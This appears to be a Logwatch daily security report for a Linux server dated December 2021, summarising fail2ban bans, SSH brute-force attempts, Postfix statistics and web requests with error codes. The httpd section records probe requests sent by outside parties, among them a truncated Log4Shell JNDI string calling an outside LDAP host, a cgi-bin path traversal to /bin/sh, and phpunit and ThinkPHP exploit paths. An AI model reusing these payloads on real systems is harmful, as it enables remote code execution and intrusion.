[TOPF] Logwatch for h2361197.stratoserver.net (Linux)

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Thu Dec 30 04:42:04 2021 Date Range Processed: yesterday ( 2021-Dec-29 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 39:38 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 34.147.79.201 -> 161.97.119.209:25562: 1 Time(s) 34.75.87.100 -> 161.97.119.209:25562: 1 Time(s) 35.201.168.66 -> 161.97.119.209:25562: 1 Time(s) 92.118.234.202 -> zapf.wiki:443: 7 Time(s) A total of 4 sites probed the server 161.35.230.3 162.62.33.200 165.227.221.200 167.71.102.95 Requests with error response codes 400 Bad Request zapf.wiki:443: 7 Time(s) 161.97.119.209:25562: 3 Time(s) mstshash=Administr: 3 Time(s) null: 3 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s) /: 1 Time(s) /.env: 1 Time(s) /.git/config: 1 Time(s) /ab2g: 1 Time(s) /ab2h: 1 Time(s) /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s) HTTP/1.0: 1 Time(s) g\xC1\x81i\xB3\xF6\xF2\xCB\xB0\xA9\x19N\xD ... x09\xC0\x13\xC0: 1 Time(s) 499 (undefined) /: 4 Time(s) 500 Internal Server Error /: 18 Time(s) /.env: 5 Time(s) /.git/config: 2 Time(s) /ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s) /robots.txt: 2 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s) ///libs/js/iframe.js: 1 Time(s) /?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s) /Autodiscover/Autodiscover.xml: 1 Time(s) /ReportServer: 1 Time(s) /_ignition/execute-solution: 1 Time(s) /actuator/health: 1 Time(s) /api/productConfig: 1 Time(s) /console/: 1 Time(s) /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s) /login: 1 Time(s) /mifs/.;/services/LogService: 1 Time(s) /owa/auth/logon.aspx: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /owa/auth/x.js: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (119.29.77.63): 38 Time(s) root (1.15.121.25): 37 Time(s) root (139.59.44.143): 35 Time(s) root (177.135.169.91): 31 Time(s) root (94.200.55.38): 30 Time(s) root (121.4.154.134): 21 Time(s) root (106.54.164.19): 20 Time(s) root (115.248.153.89): 20 Time(s) root (host-88-215-177-224.stavropol.ru): 20 Time(s) unknown (177.135.169.91): 19 Time(s) root (202.21.123.198): 18 Time(s) unknown (139.59.44.143): 15 Time(s) root (49.233.203.30): 14 Time(s) unknown (121.4.154.134): 14 Time(s) unknown (94.200.55.38): 14 Time(s) unknown (1.15.121.25): 12 Time(s) unknown (119.29.77.63): 12 Time(s) unknown (49.233.203.30): 11 Time(s) root (net-109-116-41-238.cust.vodafonedsl.it): 9 Time(s) unknown (202.21.123.198): 9 Time(s) unknown (host-88-215-177-224.stavropol.ru): 8 Time(s) root (107.189.31.241): 6 Time(s) root (111.90.145.190): 6 Time(s) root (198.98.48.203): 6 Time(s) root (199.195.252.18): 6 Time(s) root (5.79.109.48): 6 Time(s) root (89.163.252.30): 6 Time(s) root (korematsu.tor-exit.calyxinstitute.org): 6 Time(s) root (tor-exit-relay-8.anonymizing-proxy.digitalcourage.de): 6 Time(s) root (80.253.31.232): 5 Time(s) unknown (106.54.164.19): 5 Time(s) unknown (115.248.153.89): 5 Time(s) root (175.42.70.240): 3 Time(s) unknown (154.114.57.143): 2 Time(s) unknown (165.22.195.82): 2 Time(s) unknown (189.172.111.169): 2 Time(s) unknown (62.175.19.95.dynamic.jazztel.es): 2 Time(s) unknown (86.33.9.87): 2 Time(s) unknown (91.86.121.197): 2 Time(s) root (140.250.176.70): 1 Time(s) root (165.22.195.82): 1 Time(s) root (178.128.172.251): 1 Time(s) root (42.99.180.135): 1 Time(s) unknown (103.254.198.67): 1 Time(s) unknown (141.98.10.202): 1 Time(s) unknown (175.42.70.240): 1 Time(s) unknown (2.57.121.35): 1 Time(s) unknown (203.128.242.166): 1 Time(s) unknown (209.141.47.245): 1 Time(s) unknown (62.233.50.53): 1 Time(s) unknown (92.255.85.237): 1 Time(s) unknown (net-109-116-41-238.cust.vodafonedsl.it): 1 Time(s) Invalid Users: Unknown Account: 145 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 324 Miscellaneous warnings 8.185K Bytes accepted 8,381 8.185K Bytes sent via SMTP 8,381 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 1 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 1 Total 4xx Rejects 100.00% ======== ================================================== 493 Connections 327 Connections lost (inbound) 493 Disconnections 1 Removed from queue 1 Sent via SMTP ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 8 Time(s) Failed logins from: 1.15.121.25: 37 times 5.79.109.48: 6 times 42.99.180.135 (ip-42-99-180-135.asianetcom.net): 1 time 49.233.203.30: 14 times 80.253.31.232: 5 times 88.215.177.224 (host-88-215-177-224.stavropol.ru): 20 times 89.163.252.30 (srv1016.dedicated.server-hosting.expert): 6 times 94.200.55.38: 30 times 106.54.164.19: 20 times 107.189.31.241 (LuxembourgTor17.lu): 6 times 109.116.41.238 (net-109-116-41-238.cust.vodafonedsl.it): 9 times 111.90.145.190 (web12.olukotun.info): 6 times 115.248.153.89: 20 times 119.29.77.63: 38 times 121.4.154.134: 21 times 139.59.44.143: 35 times 140.250.176.70: 1 time 162.247.74.7 (korematsu.tor-exit.calyxinstitute.org): 6 times 165.22.195.82: 1 time 175.42.70.240: 3 times 177.135.169.91 (west.static.gvt.net.br): 31 times 178.128.172.251: 1 time 185.220.102.254 (tor-exit-relay-8.anonymizing-proxy.digitalcourage.de): 6 times 198.98.48.203 (NewYorkTor7.us): 6 times 199.195.252.18 (NewYorkTor15.us): 6 times 202.21.123.198: 18 times Illegal users from: 2001:470:1:332::2 (the-shadow-server-foundation.e0-1.core1.sfo2.he.net): 1 time undef: 102 times 1.15.121.25: 12 times 2.57.121.35 (smtp35.kcmoa.com): 2 times 45.88.137.100: 1 time 49.233.203.30: 11 times 62.233.50.53: 1 time 64.62.197.152: 1 time 86.33.9.87: 2 times 88.215.177.224 (host-88-215-177-224.stavropol.ru): 8 times 91.86.121.197: 2 times 92.255.85.237: 1 time 94.200.55.38: 14 times 95.19.175.62 (62.175.19.95.dynamic.jazztel.es): 2 times 103.254.198.67: 1 time 106.54.164.19: 5 times 109.116.41.238 (net-109-116-41-238.cust.vodafonedsl.it): 1 time 115.248.153.89: 5 times 119.29.77.63: 12 times 121.4.154.134: 14 times 139.59.44.143: 15 times 141.98.10.202: 1 time 154.114.57.143: 2 times 165.22.195.82: 2 times 175.42.70.240: 1 time 177.135.169.91 (west.static.gvt.net.br): 19 times 189.172.111.169 (dsl-189-172-111-169-dyn.prod-infinitum.com.mx): 2 times 202.21.123.198: 9 times 203.128.242.166: 1 time 209.141.47.245: 1 time ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop33257p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################